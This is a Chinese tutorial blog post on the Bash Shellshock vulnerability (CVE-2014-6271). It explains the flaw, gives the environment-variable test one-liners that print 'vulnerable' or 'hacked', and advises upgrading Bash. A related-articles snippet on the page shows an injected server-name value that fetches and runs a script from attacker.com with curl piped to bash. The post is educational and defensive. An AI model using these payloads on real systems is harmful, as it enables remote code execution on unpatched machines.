Bash Bug(破壳漏洞,Shellshock) - CVE-2014-6271

已于 2024-05-28 13:57:23 修改
阅读量531 收藏 4
点赞数 2
分类专栏: WEB攻防 文章标签: shellshock
于 2024-05-28 13:53:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_28369007/article/details/139265009
版权

Shellshock

在本文中,我们将深入探讨2014年发现的破壳漏洞(CVE-2014-6271),这是一个影响Unix和类Unix系统的Bash(Bourne Again SHell)的重大安全漏洞。我们将讨论这个漏洞的工作原理,展示如何复现它,并提供修补建议,以增强您的系统安全。

破壳漏洞的原理

破壳漏洞源于Bash在处理环境变量时的一个缺陷。环境变量通常用于操作系统向运行中的程序传递配置信息。Bash错误地执行了环境变量值中的代码,这些代码本应在特定条件下执行。攻击者可以利用此漏洞,通过精心构造的环境变量来迫使Bash执行附带的恶意命令。

这个漏洞的严重性在于它允许未经授权的远程执行代码,攻击者无需高级权限即可利用这个漏洞控制系统。

如何复现破壳漏洞

为了复现这一漏洞,您需要访问一个安装了易受攻击版本的Bash的系统。请在一个安全的环境中操作,如虚拟机,确保不会对真实系统造成伤害。

步骤 1: 检查Bash版本

打开您的终端或命令行界面,输入以下命令来检查您的Bash版本:

bash --version

易受攻击的版本通常是4.3及之前的版本。如果你的系统使用的是这些版本,那么很可能是易受攻击的。

步骤 2: 测试破壳漏洞

在您的终端中,执行以下命令来测试系统是否易受攻击:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

如果您看到输出中包含“vulnerable”,那么您的系统受到了破壳漏洞的影响。

步骤 3: 进一步的利用

为了进一步演示这个漏洞的危害性,可以尝试运行一个简单的命令,如下:

env x='() { :;}; echo hacked' bash -c "echo this is a test"

如果输出中包含“hacked”,则表明攻击者可以远程执行任意命令。

如何防护和修补

最有效的防护措施是更新您的Bash到最新版本。各大Linux发行版和苹果公司都已经发布了补丁来解决这一问题。

sudo apt-get update
sudo apt-get upgrade bash

对于使用其他包管理器或操作系统的用户,请查找相应的更新命令来保护您的系统。

结语

破壳漏洞是对全球数以百万计的系统构成威胁的严重安全漏洞。通过理解其原理并学习如何检测和修补,您可以显著提高自己系统的安全性。始终保持系统和软件的最新状态是保护自己免受此类漏洞攻击的关键策略。

HaSaKing_721
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulhub-Shellshock Remote Command Injection (CVE-2014-6271)
ad12456的博客
05-18 455
Shellshock远程命令注入
CVE-2014-6271-bash shellshock-破壳漏洞复现
m0_62008601的博客
08-06 3049
这些变量可以包含代码,在shell被调用后会被立即执行。用docker搭建vulhub漏洞靶场,服务启动后,有两个页面http://192.168.217.134:8080/victim.cgi和http://192.168.217.134:8080/safe.cgi。可以看到错误原因都是permission denied,那就是权限不足的原因了,那我们就修改一下权限,让它能够被访问。既然在victim.cgi可以执行命令,那么应该就可以进行反弹shell了,kali开启端口监听,执行反弹shell命令。.
Bash破壳漏洞(CVE-2014-6271)
n5xxxx__zy的博客
07-16 316
##0x00 漏洞范围: GNU Bash 版本小于等于4.3 漏洞成因: bash使用的环境变量是通过函数名称来调用的,导致漏洞出问题是以“(){”开头定义的环境变量命令ENV中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。核心的原因在于在输入的过滤中没有严格限制边界,没有做合法化的参数判断。 漏洞危害: Apache充当媒介用CGI...
vulhub漏洞复现之bashShellshock CVE-2014-6271
weixin_43071873的博客
11-27 1249
Shellshock 破壳漏洞 CVE-2014-6271 1.漏洞概述: GNU Bash 4.3及之前版本在评估某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行shell命令。某些服务和应用允许未经身份验证的远程攻击者提供环境变量以利用此漏洞。此漏洞源于在调用bash shell之前可以用构造的值创建环境变量。这些变量可以包含代码,在shell被调用后会被立即执行。 2.漏洞影响:GNU Bash <= 4.3
CVE-2014-6271漏洞复现
王嘟嘟的博客
01-16 3064
0x00 前言 要是平时我肯定不会想打去复现这个漏洞的,但是由于需要学习shellshock漏洞的利用,所以这里可以进行一下复现 0x01 正文 这里直接使用别人弄好的docker,简单又方便 docker pull hmlio/vaas-cve-2014-6271 下载完成之后,开启docker docker run -d -p 80:80 hmlio/vaas-cve-2014-6271 访问...
命令注入之Shellshock漏洞复现(CVE-2014-6271
最新发布
SmileAssassn的博客
01-23 563
命令注入之Shellshock漏洞复现(CVE-2014-6271
CVE-2014-6271——bash破壳漏洞复现
per_se_veran_ce的博客
08-23 941
(1)检查是否存在bash漏洞 env x=’() { :;}; echo vulnerable’ bash -c “echo this is a test” 安装、配置apache服务 Apache支持CGI 在cgi-bin下创建一个cgi测试文件test.cgi,并赋予它777的权限 chmod 777 test.cgi curl -H 'x: () { :;...
破壳漏洞(CVE-2014-6271)综合分析1
08-04
破壳漏洞(CVE-2014-6271)综合分析】 一、威胁卡片 破壳漏洞,也称为Bash Shellshock,是由法国的安全研究员Stéphane Chazelas在2014年9月中旬发现的。这个漏洞被赋予了CVE编号CVE-2014-6271,属于A级威胁响应...
rehl4.X,5.X,6.X bash升级包 针对漏洞CEV-2014-6271
10-14
每个相应版本对应bash rpm两个一个64位一个32位 官网下载 可以对照MD5 软件列表: bash-3.0-27.el4.i386.rpm bash-3.0-27.el4.x86_64.rpm bash-3.2-33.el5_11.4.i386.rpm ...CVE-2014-6271测试命令.txt
幽灵(GHOST)的高危安全漏洞,GNU Bash 漏洞CVE-2014-6271
10-09
bash-4.1.2-15.el6_5.2.x86_64.rpm,glibc-2.12-1.149.el6_6.5.x86_64,glibc-common-2.12-1.149.el6_6.5.x86_64.rpm,bash-4.1.2-15.el6_5.2.x86_64.rpm
ShellShock-CGI-Scan:用C语言编写的脚本,用于检查CGI脚本是否容易受到CVE-2014-6271的攻击(The Bash Bug
05-25
用C语言编写的脚本,用于检查CGI脚本是否容易受到CVE-2014-6271(The Bash Bug)的攻击。 选项: -i (local ip-address) -p (port to listen) -l (site list) -t (connection timeout) (Default: 15s) 示例:$ ./...
bash-language-server:Bash的语言服务器
01-30
npm i -g bash-language-server 如果遇到安装错误,请确保节点版本为8或更高( node --version )。 客户群 以下编辑器和IDE具有可用的客户端: Visual Studio代码( ) 原子( ) 崇高文字( ) Vim() ...
Linux Bash漏洞复现
weixin_44767073的博客
11-13 1241
Bash是什么? Bourne Again Shell(简称BASH)是在GNU/Linux上最流行的SHELL实现,于1980年诞生,经过了几十年的进化从一个简单的终端命令行解释器演变成了和GNU系统深度整合的多功能接口。根据维基百科的描述:Bash,Unix shell的一种。1989年发布第一个正式版本,原先是计划用在GNU操作系统上,但能运行于大多数类Unix系统的操作系统之上,包括Lin...
Shellshock破壳)系列漏洞简要分析及检测
Traxer的学习之路
03-13 4491
1.漏洞简介2.POC验证2.1 CVE 2014-6271最开始的shell测试脚本如下,主要的代码是第五行,它先使用env命令将() { :;}; echo vulnerable赋值给环境变量x,随后启动一个新的bash进程并执行命令echo test,并将错误信息重定向到null,再查找有无’vulnerable’这个字符串输出,如果输出成功则表示存在漏洞:#!/bin/bash EXITCO
Bash破壳漏洞
weixin_33911824的博客
07-30 217
破壳”是一个严重漏洞的别名,在Red Hat、CentOS、Ubuntu 、Fedora 、Amazon Linux 、OS X 10.10中均拥有存在CVE-2014-6271(即“破壳漏洞漏洞Bash版本,同时由于Bash在各主流操作系统的广泛应用,此漏洞的影响范围包括但不限于大多数应用Bash的Unix、Linux、Mac OS X,而针对这些操作系统管理下...
CVE-2014-6271破壳(shellshock)漏洞复现记录
dengzhasong7076的博客
07-05 535
docker大法好 搭建环境: centos 6.6 x64 docker安装 看网上说docker需要内核3.8以上,而且只能运行在64位系统 centos 6.6内核低了一点,升级一下内核。 内核升级 a、升级内核 cd /etc/yum.repos.d wget http://www.hop5.in/yum/el6/hop5.repo yum install kernel-ml-a...
bash漏洞
aS1424的博客
06-02 936
测试系统有无bash漏洞: env -i X='() { (a)=>\' bash -c 'echo date';cat echo 输出具体日期则为存在bash漏洞 将相关bash*.rpm传至服务器并安装 使用:bash -version查看版本,如为4.几版本,则安装如下三个文件 rpm -Uivh bash-4.1.2-15.el6_5.2.x86_64.rpm rpm -Uivh bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm rpm -
破壳漏洞(CVE-2014-6271)综合分析
Star——Flying in the cyberspace
11-25 2979
目 录 一、 威胁卡片  二、 概述  三、 已知事件发布/披露情况 四、 漏洞的影响范围  五、 漏洞原理  六、 漏洞验证方法  七、 漏洞检测方法  八、 漏洞可能会带来的影响  九、 针对此漏洞的建议  十、 写在最后的啰嗦的话      一、     威胁卡片 二、概述        2014年9月24日Bash被公布存在远程代码执行漏洞,安天实验室
PHP 输入验证漏洞 CVE-2018-10547复现
10-24
PHP 输入验证漏洞 CVE-2018-10547是一种远程代码执行漏洞,攻击者可以通过构造恶意IMAP服务器名称来注入任意OS命令语义,从而执行任意代码。以下是复现该漏洞的步骤: 1. 构造恶意IMAP服务器名称,包含“ -oProxyCommand”参数,例如:`127.0.0.1 -oProxyCommand="curl http://attacker.com/malicious.sh|bash"` 2. 在PHP中使用imap_open()函数连接IMAP服务器,将恶意IMAP服务器名称作为参数传入。 3. 当PHP解析恶意IMAP服务器名称时,会执行其中的恶意代码,从而导致远程代码执行漏洞。 为了防止该漏洞的攻击,建议升级openssh到OpenSSH8.4及以上版本,并确保openssl和zlib也已经升级到最新版本。此外,还应该对输入进行严格的验证和过滤,避免恶意输入的注入。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值